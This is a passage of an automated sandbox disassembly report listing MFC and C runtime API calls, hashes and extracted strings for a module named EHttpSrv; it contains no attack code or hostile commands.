                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 20415507
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 2041551A
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 2041552A
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 20415546
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 20415568
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 20415581
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 2041559D
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 204155BF
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 204155D8
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 204155F4
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 20415619
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 2041563E
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 20415672
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 20415694
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 204156B6
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 204156D8
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 204156FA
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 20415716
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 20415732
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 2041574E
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 20415769
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 20415788
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID:
                                                                                                                • API String ID: 441403673-0
                                                                                                                • Opcode ID: fb2261f334a4a593381616409003b7e7e79ccf1b339d4001bd330d7b823fe08f
                                                                                                                • Instruction ID: 3603d576dc4a89bf409d8259811608ecf062b6af5d605e23716ffd047f693520
                                                                                                                • Opcode Fuzzy Hash: fb2261f334a4a593381616409003b7e7e79ccf1b339d4001bd330d7b823fe08f
                                                                                                                • Instruction Fuzzy Hash: 1781C7F1900B90DBD721DFA988C1B97FBE5BB14204F908D2DE19EC7650D739E9488B92
                                                                                                                APIs
                                                                                                                • #6232.MFC80U(00000001,?,?,204577D1,00000000), ref: 20457906
                                                                                                                • #2651.MFC80U(00000429,?,00000001,?,?,204577D1,00000000), ref: 2045791B
                                                                                                                • #2155.MFC80U(00000429,?,00000001,?,?,204577D1,00000000), ref: 20457922
                                                                                                                • #2651.MFC80U(00000402,00000000,00000429,?,00000001,?,?,204577D1,00000000), ref: 20457937
                                                                                                                • #2155.MFC80U(00000402,00000000,00000429,?,00000001,?,?,204577D1,00000000), ref: 2045793E
                                                                                                                • #2651.MFC80U(0000040A,00000000,00000402,00000000,00000429,?,00000001,?,?,204577D1,00000000), ref: 2045796E
                                                                                                                • #2155.MFC80U(0000040A,00000000,00000402,00000000,00000429,?,00000001,?,?,204577D1,00000000), ref: 20457975
                                                                                                                • #2651.MFC80U(00001771,00000000,0000040A,00000000,00000402,00000000,00000429,?,00000001,?,?,204577D1,00000000), ref: 204579A5
                                                                                                                • #2155.MFC80U(00001771,00000000,0000040A,00000000,00000402,00000000,00000429,?,00000001,?,?,204577D1,00000000), ref: 204579AC
                                                                                                                • #2651.MFC80U(0000042A,00000000,00001771,00000000,0000040A,00000000,00000402,00000000,00000429,?,00000001,?,?,204577D1,00000000), ref: 204579D8
                                                                                                                • #2155.MFC80U(0000042A,00000000,00001771,00000000,0000040A,00000000,00000402,00000000,00000429,?,00000001,?,?,204577D1,00000000), ref: 204579DF
                                                                                                                • #2651.MFC80U(000004F8,00000000,0000042A,00000000,00001771,00000000,0000040A,00000000,00000402,00000000,00000429,?,00000001,?,?,204577D1), ref: 20457A08
                                                                                                                • #2155.MFC80U(000004F8,00000000,0000042A,00000000,00001771,00000000,0000040A,00000000,00000402,00000000,00000429,?,00000001,?,?,204577D1), ref: 20457A0F
                                                                                                                • #2651.MFC80U(000004F4,00000000,000004F8,00000000,0000042A,00000000,00001771,00000000,0000040A,00000000,00000402,00000000,00000429,?,00000001), ref: 20457A38
                                                                                                                • #2155.MFC80U(000004F4,00000000,000004F8,00000000,0000042A,00000000,00001771,00000000,0000040A,00000000,00000402,00000000,00000429,?,00000001), ref: 20457A3F
                                                                                                                • #2651.MFC80U(000004F5,00000000,000004F4,00000000,000004F8,00000000,0000042A,00000000,00001771,00000000,0000040A,00000000,00000402,00000000,00000429), ref: 20457A68
                                                                                                                • #2155.MFC80U(000004F5,00000000,000004F4,00000000,000004F8,00000000,0000042A,00000000,00001771,00000000,0000040A,00000000,00000402,00000000,00000429), ref: 20457A6F
                                                                                                                • #2651.MFC80U(000004F6,00000000), ref: 20457AA7
                                                                                                                • #2155.MFC80U(000004F6,00000000), ref: 20457AAE
                                                                                                                • #2651.MFC80U(0000040B,00000000), ref: 20457AE9
                                                                                                                • #2155.MFC80U(0000040B,00000000), ref: 20457AF0
                                                                                                                • #2651.MFC80U(00001772,00000000,0000040B,00000000), ref: 20457B2B
                                                                                                                • #2155.MFC80U(00001772,00000000,0000040B,00000000), ref: 20457B32
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2155#2651$#6232
                                                                                                                • String ID:
                                                                                                                • API String ID: 793604035-0
                                                                                                                • Opcode ID: 7b131bb64eadba3e5fa5159a75593343cac0b0a380c6cea5956b75b585b271ca
                                                                                                                • Instruction ID: 31a62825f2c348fbaeb05f40bdc2f9674bc9d37cbd3f08f150b7f628851502f9
                                                                                                                • Opcode Fuzzy Hash: 7b131bb64eadba3e5fa5159a75593343cac0b0a380c6cea5956b75b585b271ca
                                                                                                                • Instruction Fuzzy Hash: 32512970344600CFEB2687A49805FFE36E5EB62B44F40C57DA6468B6E1DBBC9E86C711
                                                                                                                APIs
                                                                                                                • #6232.MFC80U(00000001,?,?,20458B01,00000000), ref: 20458C36
                                                                                                                • #2651.MFC80U(00000429,?,00000001,?,?,20458B01,00000000), ref: 20458C4B
                                                                                                                • #2155.MFC80U(00000429,?,00000001,?,?,20458B01,00000000), ref: 20458C52
                                                                                                                • #2651.MFC80U(00000401,00000000,00000429,?,00000001,?,?,20458B01,00000000), ref: 20458C67
                                                                                                                • #2155.MFC80U(00000401,00000000,00000429,?,00000001,?,?,20458B01,00000000), ref: 20458C6E
                                                                                                                • #2651.MFC80U(00001771,00000000,00000401,00000000,00000429,?,00000001,?,?,20458B01,00000000), ref: 20458C98
                                                                                                                • #2155.MFC80U(00001771,00000000,00000401,00000000,00000429,?,00000001,?,?,20458B01,00000000), ref: 20458C9F
                                                                                                                • #2651.MFC80U(0000040A,00000000,00001771,00000000,00000401,00000000,00000429,?,00000001,?,?,20458B01,00000000), ref: 20458CCF
                                                                                                                • #2155.MFC80U(0000040A,00000000,00001771,00000000,00000401,00000000,00000429,?,00000001,?,?,20458B01,00000000), ref: 20458CD6
                                                                                                                • #2651.MFC80U(0000042A,00000000,0000040A,00000000,00001771,00000000,00000401,00000000,00000429,?,00000001,?,?,20458B01,00000000), ref: 20458D02
                                                                                                                • #2155.MFC80U(0000042A,00000000,0000040A,00000000,00001771,00000000,00000401,00000000,00000429,?,00000001,?,?,20458B01,00000000), ref: 20458D09
                                                                                                                • #2651.MFC80U(000004F7,00000000,0000042A,00000000,0000040A,00000000,00001771,00000000,00000401,00000000,00000429,?,00000001,?,?,20458B01), ref: 20458D32
                                                                                                                • #2155.MFC80U(000004F7,00000000,0000042A,00000000,0000040A,00000000,00001771,00000000,00000401,00000000,00000429,?,00000001,?,?,20458B01), ref: 20458D39
                                                                                                                • #2651.MFC80U(000004F1,00000000,000004F7,00000000,0000042A,00000000,0000040A,00000000,00001771,00000000,00000401,00000000,00000429,?,00000001), ref: 20458D62
                                                                                                                • #2155.MFC80U(000004F1,00000000,000004F7,00000000,0000042A,00000000,0000040A,00000000,00001771,00000000,00000401,00000000,00000429,?,00000001), ref: 20458D69
                                                                                                                • #2651.MFC80U(000004F2,00000000,000004F1,00000000,000004F7,00000000,0000042A,00000000,0000040A,00000000,00001771,00000000,00000401,00000000,00000429), ref: 20458D92
                                                                                                                • #2155.MFC80U(000004F2,00000000,000004F1,00000000,000004F7,00000000,0000042A,00000000,0000040A,00000000,00001771,00000000,00000401,00000000,00000429), ref: 20458D99
                                                                                                                • #2651.MFC80U(000004F3,00000000), ref: 20458DD1
                                                                                                                • #2155.MFC80U(000004F3,00000000), ref: 20458DD8
                                                                                                                • #2651.MFC80U(0000040B,00000000), ref: 20458E13
                                                                                                                • #2155.MFC80U(0000040B,00000000), ref: 20458E1A
                                                                                                                • #2651.MFC80U(00001772,00000000,0000040B,00000000), ref: 20458E55
                                                                                                                • #2155.MFC80U(00001772,00000000,0000040B,00000000), ref: 20458E5C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2155#2651$#6232
                                                                                                                • String ID:
                                                                                                                • API String ID: 793604035-0
                                                                                                                • Opcode ID: bb6037c50241223fbd7e8c3347ad34d8d324fba55ace37c8542ed0f19dfd06de
                                                                                                                • Instruction ID: 949a63b86c2facbe1e4c267be29fcaf67d256d5a06d32d8d12ce164099b2909d
                                                                                                                • Opcode Fuzzy Hash: bb6037c50241223fbd7e8c3347ad34d8d324fba55ace37c8542ed0f19dfd06de
                                                                                                                • Instruction Fuzzy Hash: AF511D30340600CBEA1687A48816BFA36F5EB71B04F40C57DE6469BAE0DFBC5D8AC751
                                                                                                                APIs
                                                                                                                • #314.MFC80U(00000000,FEEA6C22,76945540,?), ref: 20440B41
                                                                                                                • #6232.MFC80U(00000001), ref: 20440B52
                                                                                                                • #2651.MFC80U(00000481,00000000,00000001), ref: 20440B85
                                                                                                                • #2155.MFC80U(00000481,00000000,00000001), ref: 20440B8C
                                                                                                                • #2651.MFC80U(000003EF,00000000,00000481,00000000,00000001), ref: 20440BBB
                                                                                                                • #2155.MFC80U(000003EF,00000000,00000481,00000000,00000001), ref: 20440BC2
                                                                                                                • #2651.MFC80U(00000414,?,000003EF,00000000,00000481,00000000,00000001), ref: 20440BCF
                                                                                                                • #2155.MFC80U(00000414,?,000003EF,00000000,00000481,00000000,00000001), ref: 20440BD6
                                                                                                                • #2651.MFC80U(00000415,00000000,00000414,?,000003EF,00000000,00000481,00000000,00000001), ref: 20440BF9
                                                                                                                • #2155.MFC80U(00000415,00000000,00000414,?,000003EF,00000000,00000481,00000000,00000001), ref: 20440C00
                                                                                                                • #2651.MFC80U(00000485,00000000,00000415,00000000,00000414,?,000003EF,00000000,00000481,00000000,00000001), ref: 20440C23
                                                                                                                • #2155.MFC80U(00000485,00000000,00000415,00000000,00000414,?,000003EF,00000000,00000481,00000000,00000001), ref: 20440C2A
                                                                                                                • #2651.MFC80U(0000048C,00000000,00000485,00000000,00000415,00000000,00000414,?,000003EF,00000000,00000481,00000000,00000001), ref: 20440C56
                                                                                                                • #2155.MFC80U(0000048C,00000000,00000485,00000000,00000415,00000000,00000414,?,000003EF,00000000,00000481,00000000,00000001), ref: 20440C5D
                                                                                                                • #2651.MFC80U(00000480,00000000,0000048C,00000000,00000485,00000000,00000415,00000000,00000414,?,000003EF,00000000,00000481,00000000,00000001), ref: 20440C80
                                                                                                                • #2155.MFC80U(00000480,00000000,0000048C,00000000,00000485,00000000,00000415,00000000,00000414,?,000003EF,00000000,00000481,00000000,00000001), ref: 20440C87
                                                                                                                • #2651.MFC80U(0000048D,00000000,00000480,00000000,0000048C,00000000,00000485,00000000,00000415,00000000,00000414,?,000003EF,00000000,00000481,00000000), ref: 20440CB3
                                                                                                                • #2155.MFC80U(0000048D,00000000,00000480,00000000,0000048C,00000000,00000485,00000000,00000415,00000000,00000414,?,000003EF,00000000,00000481,00000000), ref: 20440CBA
                                                                                                                • #2651.MFC80U(00000493,?,0000048D,00000000,00000480,00000000,0000048C,00000000,00000485,00000000,00000415,00000000,00000414,?,000003EF,00000000), ref: 20440CC7
                                                                                                                • #2155.MFC80U(00000493,?,0000048D,00000000,00000480,00000000,0000048C,00000000,00000485,00000000,00000415,00000000,00000414,?,000003EF,00000000), ref: 20440CCE
                                                                                                                • #2651.MFC80U(00000488,?,00000493,?,0000048D,00000000,00000480,00000000,0000048C,00000000,00000485,00000000,00000415,00000000,00000414,?), ref: 20440CDB
                                                                                                                • #2155.MFC80U(00000488,?,00000493,?,0000048D,00000000,00000480,00000000,0000048C,00000000,00000485,00000000,00000415,00000000,00000414,?), ref: 20440CE2
                                                                                                                • #6751.MFC80U(00000000,?,00000488,?,00000493,?,0000048D,00000000,00000480,00000000,0000048C,00000000,00000485,00000000,00000415,00000000), ref: 20440D0C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2155#2651$#314#6232#6751
                                                                                                                • String ID:
                                                                                                                • API String ID: 4250440665-0
                                                                                                                • Opcode ID: 1d070f6378b8014c016d1c576663556e4a03c37731633ca55db6d18dc55688bf
                                                                                                                • Instruction ID: 7ccf6fe6ad885201f560ca1b0cb57e30665e492daf65b9dd9f5484799068d034
                                                                                                                • Opcode Fuzzy Hash: 1d070f6378b8014c016d1c576663556e4a03c37731633ca55db6d18dc55688bf
                                                                                                                • Instruction Fuzzy Hash: 34519E70B447409AF71987F08856BFE61A5DB90F08F40CA2DB6918B7E0DE7DAC828745
                                                                                                                APIs
                                                                                                                  • Part of subcall function 20401670: malloc.MSVCR80 ref: 2040169E
                                                                                                                  • Part of subcall function 20401670: malloc.MSVCR80 ref: 204016B0
                                                                                                                  • Part of subcall function 20401670: free.MSVCR80 ref: 204016BD
                                                                                                                • #310.MFC80U(00000001), ref: 2046875C
                                                                                                                • #310.MFC80U ref: 2046876E
                                                                                                                • #4026.MFC80U(000000B6), ref: 20468782
                                                                                                                • #4026.MFC80U(000000B2), ref: 20468791
                                                                                                                • MessageBoxW.USER32(00000000,?,?,00000010), ref: 204687A5
                                                                                                                • #578.MFC80U ref: 204687B4
                                                                                                                • #578.MFC80U ref: 204687C6
                                                                                                                • #1176.MFC80U(?,-00003AB4,?,?), ref: 204687D1
                                                                                                                • realloc.MSVCR80 ref: 20468AAA
                                                                                                                  • Part of subcall function 2041B690: memmove_s.MSVCR80 ref: 2041B6E2
                                                                                                                • GlobalAlloc.KERNEL32(00000000,?), ref: 20468B8A
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 20468BC7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #310#4026#578Globalmalloc$#1176AllocFreeMessagefreememmove_srealloc
                                                                                                                • String ID: <?xml version="1.0" encoding="utf-8"?>$<?xml version="1.0"?>$ALL$NAME$REMOVED$RULE$ZONE
                                                                                                                • API String ID: 3761394589-1430527591
                                                                                                                • Opcode ID: a74c6a03c573ab209a753c9af0f6d51fd380f11e6a6ff1b28efef78ec990bb88
                                                                                                                • Instruction ID: 6e10fa3624d86319f28baa58daf9d5af0a5b43c5a6595124e08bec108179230f
                                                                                                                • Opcode Fuzzy Hash: a74c6a03c573ab209a753c9af0f6d51fd380f11e6a6ff1b28efef78ec990bb88
                                                                                                                • Instruction Fuzzy Hash: 3F029AB06047419FD720CF94CC80B5AB7E5BF84708F108A2EF98587B92E779AA45CF52
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ADDRESS$BEGIN$DESCRIPTION$END$FLAGS$IP6_ADDR$IP6_SUBNET$IP_ADDR$IP_RANGE$IP_SUBNET$MASK$MASKBITS$MODIFIED$NAME$USER_NAME$VALUE
                                                                                                                • API String ID: 0-527909642
                                                                                                                • Opcode ID: 3c82f5f2b4f892e01918e5e7548164b6407f9121cbc584f50f4c4988bbfc1e02
                                                                                                                • Instruction ID: 4aef6be7a0691e11aa97e6274f853f735ab2d7b604b450da3e5b0da1a6f65dab
                                                                                                                • Opcode Fuzzy Hash: 3c82f5f2b4f892e01918e5e7548164b6407f9121cbc584f50f4c4988bbfc1e02
                                                                                                                • Instruction Fuzzy Hash: BDD1F6B210830197C710DFE4D840B5AF391AF64668F94CB1DE946A7342E72EEE87C792
                                                                                                                APIs
                                                                                                                • #314.MFC80U(00000000,?,00000001,00000000,?), ref: 2044216C
                                                                                                                • #310.MFC80U(00000000,?,00000001,00000000,?), ref: 20442180
                                                                                                                • #310.MFC80U(?,00000001,00000000,?), ref: 20442192
                                                                                                                • #4026.MFC80U(00000218,?,00000001,00000000,?), ref: 204421A9
                                                                                                                • #4026.MFC80U(000000B2,?,00000001,00000000,?), ref: 204421B8
                                                                                                                • #578.MFC80U ref: 204421E3
                                                                                                                • #578.MFC80U ref: 204421F5
                                                                                                                • #6751.MFC80U(00000000,?), ref: 20442223
                                                                                                                • #314.MFC80U(00000000,?,00000000), ref: 20442280
                                                                                                                • #310.MFC80U(00000000,?,00000000), ref: 20442294
                                                                                                                • #310.MFC80U(?,00000000), ref: 204422A5
                                                                                                                • #4026.MFC80U(000002B0,?,00000000), ref: 204422BC
                                                                                                                • #4026.MFC80U(000000B2,?,00000000), ref: 204422CB
                                                                                                                • #578.MFC80U ref: 204422FE
                                                                                                                • #578.MFC80U ref: 20442310
                                                                                                                • #6751.MFC80U(00000000,?), ref: 2044233E
                                                                                                                  • Part of subcall function 2043E1B0: memcpy_s.MSVCR80 ref: 2043E218
                                                                                                                  • Part of subcall function 2043E1B0: memcpy_s.MSVCR80 ref: 2043E242
                                                                                                                  • Part of subcall function 2043E1B0: memcpy_s.MSVCR80 ref: 2043E272
                                                                                                                  • Part of subcall function 2043E1B0: memcpy_s.MSVCR80 ref: 2043E29F
                                                                                                                • #578.MFC80U ref: 20442353
                                                                                                                • #578.MFC80U ref: 20442365
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #578$#310#4026memcpy_s$#314#6751
                                                                                                                • String ID:
                                                                                                                • API String ID: 1842428633-3916222277
                                                                                                                • Opcode ID: 3632554ad2964c357690e4290160f4c997d73ee3802bf68369c0139166bea1fb
                                                                                                                • Instruction ID: c312dbba11933494abf222c39655f6629bf2428d9f4299d1424d63f91545401a
                                                                                                                • Opcode Fuzzy Hash: 3632554ad2964c357690e4290160f4c997d73ee3802bf68369c0139166bea1fb
                                                                                                                • Instruction Fuzzy Hash: BA91BF305083859FD320DF54CC85BDABBE4BFA4719F508A2CF989572E0DB789A44CB92
                                                                                                                APIs
                                                                                                                • #310.MFC80U(FEEA6C22), ref: 20456E81
                                                                                                                • #310.MFC80U ref: 20456E93
                                                                                                                • #4026.MFC80U(000000AD), ref: 20456EAA
                                                                                                                • #4026.MFC80U(000000AE), ref: 20456EB9
                                                                                                                • #900.MFC80U( (*.exe)|*.exe|), ref: 20456EC8
                                                                                                                • #896.MFC80U(?), ref: 20456ED7
                                                                                                                • #900.MFC80U( (*.*)|*.*|), ref: 20456EE6
                                                                                                                • #385.MFC80U(00000001,00000000,00000000,00881001,?,?,00000000), ref: 20456F00
                                                                                                                • #2012.MFC80U(00000001,00000000,00000000,00881001,?,?,00000000), ref: 20456F11
                                                                                                                • #3082.MFC80U(?,00000001,00000000,00000000,00881001,?,?,00000000), ref: 20456F28
                                                                                                                  • Part of subcall function 2040E820: #764.MFC80U(?,00000000,?,2040F224,?,00000001), ref: 2040E830
                                                                                                                  • Part of subcall function 2040E820: #265.MFC80U(00000000,?,00000000,?,2040F224,?,00000001), ref: 2040E876
                                                                                                                  • Part of subcall function 2040E820: _wcsupr_s.MSVCR80 ref: 2040E896
                                                                                                                • #578.MFC80U(?,00000001,?,00000001,00000000,00000000,00881001,?,?,00000000), ref: 20456F4F
                                                                                                                • SendMessageW.USER32(?,0000101E,00000000,0000FFFF), ref: 20456FAF
                                                                                                                • #630.MFC80U(00000001,00000000,00000000,00881001,?,?,00000000), ref: 20456FCE
                                                                                                                • #578.MFC80U(00000001,00000000,00000000,00881001,?,?,00000000), ref: 20456FDF
                                                                                                                • #578.MFC80U(?,00000000), ref: 20456FF1
                                                                                                                • #764.MFC80U(00000000,?,00000000), ref: 20457007
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #578$#310#4026#764#900$#2012#265#3082#385#630#896MessageSend_wcsupr_s
                                                                                                                • String ID: (*.*)|*.*|$ (*.exe)|*.exe|$@
                                                                                                                • API String ID: 4155270257-2039417011
